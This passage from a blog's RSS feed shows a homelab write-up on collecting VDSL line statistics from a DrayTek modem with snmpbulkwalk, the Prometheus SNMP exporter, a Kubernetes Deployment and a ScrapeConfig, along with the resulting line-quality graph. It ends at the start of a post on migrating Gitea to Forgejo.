SNMPv2-SMI::transmission.251.1.2.2.1.2.4.2 = Gauge32: 46718000
SNMPv2-SMI::transmission.251.1.2.2.1.3.4.1 = Gauge32: 0
SNMPv2-SMI::transmission.251.1.2.2.1.3.4.2 = Gauge32: 0
SNMPv2-SMI::transmission.251.1.2.2.1.4.4.1 = INTEGER: 9
SNMPv2-SMI::transmission.251.1.2.2.1.4.4.2 = INTEGER: 0
SNMPv2-SMI::transmission.251.1.2.2.1.5.4.1 = INTEGER: 305
SNMPv2-SMI::transmission.251.1.2.2.1.5.4.2 = INTEGER: 150
SNMPv2-SMI::transmission.251.1.2.2.1.6.4.1 = INTEGER: 0
SNMPv2-SMI::transmission.251.1.2.2.1.6.4.2 = INTEGER: 0
[...]
</code></pre><p>These outputs, on their own, are not really that useful. Note especially the
<code>251.1.2.2.1</code> and <code>94.1.1.3.1</code> as part of the OIDs. That indicates that
<code>snmpbulkwalk</code> did not have the necessary MIBs to properly decode the information
received from my modem. This can be fixed by making those MIBs available.
Helpfully, DrayTek provides the supported MIBs for the devices <a href="https://www.draytek.com/support/knowledge-base/5517">on their website</a>.
Namely, the following MIBs are supported:</p>
<ul>
<li><a href="https://mibbrowser.online/mibdb_search.php?mib=SNMPv2-MIB">SNMPv2-MIB</a></li>
<li><a href="https://mibbrowser.online/mibdb_search.php?mib=ADSL-LINE-MIB">ADSL-LINE-MIB</a></li>
<li><a href="https://mibbrowser.online/mibdb_search.php?mib=VDSL2-LINE-MIB">VDSL2-LINE-MIB</a></li>
</ul>
<p>All of the links go to <a href="https://mibbrowser.online">mibbrowser</a>, which I&rsquo;ve found
a useful page to download MIBs. To make <code>snmpbulkwalk</code> use those additional MIBs,
download them into a local directory and start <code>snmpbulkwalk</code> like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>snmpbulkwalk -M /path/to/downloaded/mibs/:/usr/share/snmp/mibs -m ALL -v 2c -c example 203.0.113.1
</span></span></code></pre></div><p>The <code>/usr/share/snmp/mibs</code> path points to the general MIBs shipped with
my Gentoo system, so the more common MIBs don&rsquo;t have to be downloaded separately.</p>
<p>With that invocation, the above example becomes a lot clearer:</p>
<pre tabindex="0"><code>ADSL-LINE-MIB::adslAturCurrOutputPwr.4 = INTEGER: -3 tenth dBm
ADSL-LINE-MIB::adslAturCurrAttainableRate.4 = Gauge32: 51192000 bps
ADSL-LINE-MIB::adslAtucChanInterleaveDelay.4 = Gauge32: 0 milli-seconds
ADSL-LINE-MIB::adslAtucChanCurrTxRate.4 = Gauge32: 0 bps
ADSL-LINE-MIB::adslAtucChanPrevTxRate.4 = Gauge32: 0 bps
ADSL-LINE-MIB::adslAtucChanCrcBlockLength.4 = Gauge32: 0 byte
ADSL-LINE-MIB::adslAturChanInterleaveDelay.4 = Gauge32: 0 milli-seconds
ADSL-LINE-MIB::adslAturChanCurrTxRate.4 = Gauge32: 0 bps
ADSL-LINE-MIB::adslAturChanPrevTxRate.4 = Gauge32: 0 bps
ADSL-LINE-MIB::adslAturChanCrcBlockLength.4 = Gauge32: 0
VDSL2-LINE-MIB::xdsl2ChStatusUnit.4.xtur = INTEGER: xtur(2)
VDSL2-LINE-MIB::xdsl2ChStatusActDataRate.4.xtuc = Gauge32: 292016000 bits/second
VDSL2-LINE-MIB::xdsl2ChStatusActDataRate.4.xtur = Gauge32: 46718000 bits/second
VDSL2-LINE-MIB::xdsl2ChStatusPrevDataRate.4.xtuc = Gauge32: 0 bits/second
VDSL2-LINE-MIB::xdsl2ChStatusPrevDataRate.4.xtur = Gauge32: 0 bits/second
VDSL2-LINE-MIB::xdsl2ChStatusActDelay.4.xtuc = Wrong Type (should be Gauge32 or Unsigned32): INTEGER: 9
VDSL2-LINE-MIB::xdsl2ChStatusActDelay.4.xtur = Wrong Type (should be Gauge32 or Unsigned32): INTEGER: 0
VDSL2-LINE-MIB::xdsl2ChStatusActInp.4.xtuc = Wrong Type (should be Gauge32 or Unsigned32): INTEGER: 305
VDSL2-LINE-MIB::xdsl2ChStatusActInp.4.xtur = Wrong Type (should be Gauge32 or Unsigned32): INTEGER: 150
VDSL2-LINE-MIB::xdsl2ChStatusInpReport.4.xtuc = INTEGER: 0
VDSL2-LINE-MIB::xdsl2ChStatusInpReport.4.xtur = INTEGER: 0
</code></pre><p>The addition of the correct MIBs allows <code>snmpbulkwalk</code> to correctly interpret
the values coming from the modem. I&rsquo;m not 100% sure what the <code>Wrong Type</code> errors
are about, but I assume that the modem just doesn&rsquo;t implement the MIB quite
correctly.</p>
<h2 id="configuring-the-snmp-exporter">Configuring the SNMP exporter</h2>
<p>As I&rsquo;ve noted above, the configuration of the SNMP exporter is a bit more involved.</p>
<p>First, a generator config needs to be created. In my case, it looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">auths</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">draytek</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">community</span>: <span style="color:#ae81ff">example</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">version</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">modules</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">draytek</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">walk</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">1.3.6.1.2.1.10.94.1.1.3.1.6.4</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">1.3.6.1.2.1.10.94.1.1.3.1.4.4</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">1.3.6.1.2.1.10.94.1.1.3.1.5.4</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">1.3.6.1.2.1.1.5</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">1.3.6.1.2.1.10.251.1.2.2.1.2.4.1</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">1.3.6.1.2.1.10.251.1.2.2.1.2.4.2</span>
</span></span></code></pre></div><p>As you can see, I&rsquo;m only declaring a handful of values I actually want to gather.
I&rsquo;m skipping most of the per-interface data, because I can already get that data
from the PPPoE interface on my OPNsense router. I&rsquo;ve restricted my gathering to
the modem specific data:</p>
<ul>
<li><code>1.3.6.1.2.1.10.94.1.1.3.1.6</code>: Current status of the ADSL line</li>
<li><code>1.3.6.1.2.1.10.94.1.1.3.1.4</code>: Current noise on the line</li>
<li><code>1.3.6.1.2.1.10.94.1.1.3.1.5</code>: Current attenuation on the line</li>
<li><code>1.3.6.1.2.1.1.5</code>: System name</li>
<li><code>1.3.6.1.2.1.10.251.1.2.2.1.2</code>: Current actual data rate on the line, Up and Down</li>
</ul>
<p>With that defined, the SNMP exporter config file can be generated. But first,
I needed to build the generator. For this, I cloned the <a href="https://github.com/prometheus/snmp_exporter">SNMP exporter repo</a>
and switched into the <code>generator/</code> directory. There, I ran this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>make generator
</span></span></code></pre></div><p>And then finally, I was able to run the command to generate the SNMP exporter
config file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>./generator generate -m /PATH/TO/MIB/DIR -g /PATH/TO/generator.yml -o snmp.yaml
</span></span></code></pre></div><p>With the configuration above, the result looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#75715e"># WARNING: This file was auto-generated using snmp_exporter generator, manual changes will be lost.</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">auths</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">draytek</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">community</span>: <span style="color:#ae81ff">example</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">security_level</span>: <span style="color:#ae81ff">noAuthNoPriv</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">auth_protocol</span>: <span style="color:#ae81ff">MD5</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">priv_protocol</span>: <span style="color:#ae81ff">DES</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">version</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">modules</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">draytek</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">get</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">1.3.6.1.2.1.1.5.0</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">1.3.6.1.2.1.10.251.1.2.2.1.2.4.1</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">1.3.6.1.2.1.10.251.1.2.2.1.2.4.2</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">1.3.6.1.2.1.10.94.1.1.3.1.4.4</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">1.3.6.1.2.1.10.94.1.1.3.1.5.4</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">1.3.6.1.2.1.10.94.1.1.3.1.6.4</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metrics</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">sysName</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">oid</span>: <span style="color:#ae81ff">1.3.6.1.2.1.1.5</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">DisplayString</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">help</span>: <span style="color:#ae81ff">An administratively-assigned name for this managed node - 1.3.6.1.2.1.1.5</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">xdsl2ChStatusActDataRate</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">oid</span>: <span style="color:#ae81ff">1.3.6.1.2.1.10.251.1.2.2.1.2</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">gauge</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">help</span>: <span style="color:#ae81ff">The actual net data rate at which the bearer channel is operating, if</span>
</span></span><span style="display:flex;"><span>        <span style="color:#ae81ff">in L0 power management state - 1.3.6.1.2.1.10.251.1.2.2.1.2</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">indexes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">labelname</span>: <span style="color:#ae81ff">ifIndex</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">gauge</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">labelname</span>: <span style="color:#ae81ff">xdsl2ChStatusUnit</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">gauge</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">enum_values</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">1</span>: <span style="color:#ae81ff">xtuc</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">2</span>: <span style="color:#ae81ff">xtur</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">adslAturCurrSnrMgn</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">oid</span>: <span style="color:#ae81ff">1.3.6.1.2.1.10.94.1.1.3.1.4</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">gauge</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">help</span>: <span style="color:#ae81ff">Noise Margin as seen by this ATU with respect to its received signal in</span>
</span></span><span style="display:flex;"><span>        <span style="color:#ae81ff">tenth dB. - 1.3.6.1.2.1.10.94.1.1.3.1.4</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">indexes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">labelname</span>: <span style="color:#ae81ff">ifIndex</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">gauge</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">adslAturCurrAtn</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">oid</span>: <span style="color:#ae81ff">1.3.6.1.2.1.10.94.1.1.3.1.5</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">gauge</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">help</span>: <span style="color:#ae81ff">Measured difference in the total power transmitted by the peer ATU and</span>
</span></span><span style="display:flex;"><span>        <span style="color:#ae81ff">the total power received by this ATU. - 1.3.6.1.2.1.10.94.1.1.3.1.5</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">indexes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">labelname</span>: <span style="color:#ae81ff">ifIndex</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">gauge</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">adslAturCurrStatus</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">oid</span>: <span style="color:#ae81ff">1.3.6.1.2.1.10.94.1.1.3.1.6</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">Bits</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">help</span>: <span style="color:#ae81ff">Indicates current state of the ATUR line - 1.3.6.1.2.1.10.94.1.1.3.1.6</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">indexes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">labelname</span>: <span style="color:#ae81ff">ifIndex</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">gauge</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enum_values</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">0</span>: <span style="color:#ae81ff">noDefect</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">1</span>: <span style="color:#ae81ff">lossOfFraming</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">2</span>: <span style="color:#ae81ff">lossOfSignal</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">3</span>: <span style="color:#ae81ff">lossOfPower</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">4</span>: <span style="color:#ae81ff">lossOfSignalQuality</span>
</span></span></code></pre></div><p>This file defines the translation of the OID values to Prometheus metrics. The
output in Prometheus format ultimately looks like this:</p>
<pre tabindex="0"><code># HELP adslAturCurrAtn Measured difference in the total power transmitted by the peer ATU and the total power received by this ATU. - 1.3.6.1.2.1.10.94.1.1.3.1.5
# TYPE adslAturCurrAtn gauge
adslAturCurrAtn{ifIndex=&#34;4&#34;} 5
# HELP adslAturCurrSnrMgn Noise Margin as seen by this ATU with respect to its received signal in tenth dB. - 1.3.6.1.2.1.10.94.1.1.3.1.4
# TYPE adslAturCurrSnrMgn gauge
adslAturCurrSnrMgn{ifIndex=&#34;4&#34;} 8
# HELP adslAturCurrStatus Indicates current state of the ATUR line - 1.3.6.1.2.1.10.94.1.1.3.1.6 (Bits)
# TYPE adslAturCurrStatus gauge
adslAturCurrStatus{adslAturCurrStatus=&#34;lossOfFraming&#34;,ifIndex=&#34;4&#34;} 0
adslAturCurrStatus{adslAturCurrStatus=&#34;lossOfPower&#34;,ifIndex=&#34;4&#34;} 0
adslAturCurrStatus{adslAturCurrStatus=&#34;lossOfSignal&#34;,ifIndex=&#34;4&#34;} 0
adslAturCurrStatus{adslAturCurrStatus=&#34;lossOfSignalQuality&#34;,ifIndex=&#34;4&#34;} 0
adslAturCurrStatus{adslAturCurrStatus=&#34;noDefect&#34;,ifIndex=&#34;4&#34;} 0
# HELP sysName An administratively-assigned name for this managed node - 1.3.6.1.2.1.1.5
# TYPE sysName gauge
sysName{sysName=&#34;foobar&#34;} 1
# HELP xdsl2ChStatusActDataRate The actual net data rate at which the bearer channel is operating, if in L0 power management state - 1.3.6.1.2.1.10.251.1.2.2.1.2
# TYPE xdsl2ChStatusActDataRate gauge
xdsl2ChStatusActDataRate{ifIndex=&#34;4&#34;,xdsl2ChStatusUnit=&#34;1&#34;} 2.92016e+08
xdsl2ChStatusActDataRate{ifIndex=&#34;4&#34;,xdsl2ChStatusUnit=&#34;2&#34;} 4.6718e+07
</code></pre><p>The one thing that I could never really get to work is the <code>adslAturCurrStatus</code>
value. It should be showing the current state of the line, indicating whether the
DSL line itself is up or not. But I never got it to show anything. All values are
always zero, even though I would have expected the <code>noDefect</code> value to be <code>1</code>
when everything is alright. But it only ever gave me zeroes.</p>
<p>One nice thing to see: I&rsquo;m actually getting slightly faster downstream service
than what I&rsquo;m paying for. I&rsquo;ve got a 250/40 contract, but I&rsquo;m getting 292 Mbit/s
down and 46 Mbit/s up. I think that might be because there&rsquo;s not many other
users on this connection overall, as most people in the neighborhood have cable
Internet instead.</p>
<p>With the configuration file in hand, here is the Deployment configuration:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">snmp-exporter</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">snmp-exporter</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">snmp-exporter</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/config</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/exporter-config.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">snmp-exporter</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">prom/snmp-exporter:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;--log.format=json&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;--config.file=/etc/snmp_exporter/snmp.yml&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/etc/snmp_exporter</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">50Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.port }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/-/healthy&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">initialDelaySeconds</span>: <span style="color:#ae81ff">15</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">snmp-scrape</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.port }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">exporter-config</span>
</span></span></code></pre></div><p>The more interesting configuration is the <a href="https://prometheus-operator.dev/docs/developer/scrapeconfig/">ScrapeConfig</a>
for the Prometheus operator. Because if you look back at the generated config
file, you will find something missing: A declaration of a target. This is instead
done as part of the scrape config, which in my case looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">monitoring.coreos.com/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ScrapeConfig</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scraping-modem</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">prometheus</span>: <span style="color:#ae81ff">scrape-modems</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">staticConfigs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">job</span>: <span style="color:#ae81ff">modemmetrics</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targets</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">203.0.113.1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metricsPath</span>: <span style="color:#ae81ff">/snmp</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">scrapeInterval</span>: <span style="color:#ae81ff">1m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">params</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">module</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">draytek</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">auth</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">draytek</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">relabelings</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;__address__&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetLabel</span>: <span style="color:#ae81ff">__param_target</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">targetLabel</span>: <span style="color:#ae81ff">instance</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replacement</span>: <span style="color:#ae81ff">modemnamehere</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">targetLabel</span>: <span style="color:#ae81ff">__address__</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replacement</span>: <span style="color:#e6db74">&#34;snmp-exporter.snmp-exporter.svc.cluster.local:9116&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metricRelabelings</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">snmp_scrape_.*</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">sysName</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">scrape_.*</span>
</span></span></code></pre></div><p>It&rsquo;s important to note that the IP under <code>targets</code> is the IP of the modem, not the
IP of the SNMP exporter. This is different from how e.g. the node exporter works.
There, the targets are the machines which run the exporter. Instead, the <code>__address__</code>
label needs to be replaced in a relabeling so that Prometheus contacts the
exporter.</p>
<p>The <code>params.module</code> and <code>params.auth</code> parameters define the sections from
the SNMP exporter&rsquo;s config file to be used for this scrape job. This way,
you can have multiple sections for different types of devices in one exporter&rsquo;s
config and control the target+module/auth combinations in the scrape config.
To be honest, this way of configuring things feels a bit odd to me. I would have
rather expected the different targets to be defined in the exporter&rsquo;s config
and then be supplied with an identifying label in the metrics.</p>
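<p>A good way to check what the relabelings actually produce is to query the exporter by
hand. After the relabelings above, Prometheus effectively requests something like this
(service name and modem IP taken from the configs above):</p>
<pre tabindex="0"><code>curl 'http://snmp-exporter.snmp-exporter.svc.cluster.local:9116/snmp?target=203.0.113.1&amp;module=draytek&amp;auth=draytek'
</code></pre>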
<h2 id="results">Results</h2>
<p>Sadly, I don&rsquo;t really have any interesting plots to show here, save perhaps for
this one, which shows that my line got a lot better towards the end of 2023:
<figure>
    <img loading="lazy" src="line-quality.png"
         alt="A screenshot of a Grafana time series plot. It shows two series, the signal-to-noise ratio and the attenuation of the VDSL line which delivered you this blog post. The date is back in October 2023. Both values are very stable, with almost no fluctuation at all. The attenuation starts at 10 dB, and the SNR at 6 dB. On October 12th around 07:00, the line suddenly improves in both values. The attenuation is reduced to a value of 5 dB, while the SNR improves to 8. Both continue with these values until the end of the plot."/> <figcaption>
            <p>Attenuation and Signal-to-Noise ratio of my VDSL line. Attenuation in green starting at 10 dB, SNR in yellow starting at 6.</p>
        </figcaption>
</figure>
</p>
<p>The quality of my line markedly improved around October 12th. I don&rsquo;t know what
might have changed here, but attenuation went down by 4 dB and Signal-to-Noise
ratio improved by 2 dB. That didn&rsquo;t come with any improvements for me, though.</p>
<p>And that&rsquo;s it for today. Another small step in my quest to monitor absolutely
everything. &#x1f601;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Migrating from Gitea to Forgejo</title>
      <link>https://blog.mei-home.net/posts/forgejo-migration/</link>
      <pubDate>Fri, 23 May 2025 00:01:02 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/forgejo-migration/</guid>
      <description>Migrating from Gitea to Forgejo via repo migration</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my Gitea instance to Forgejo.</p>
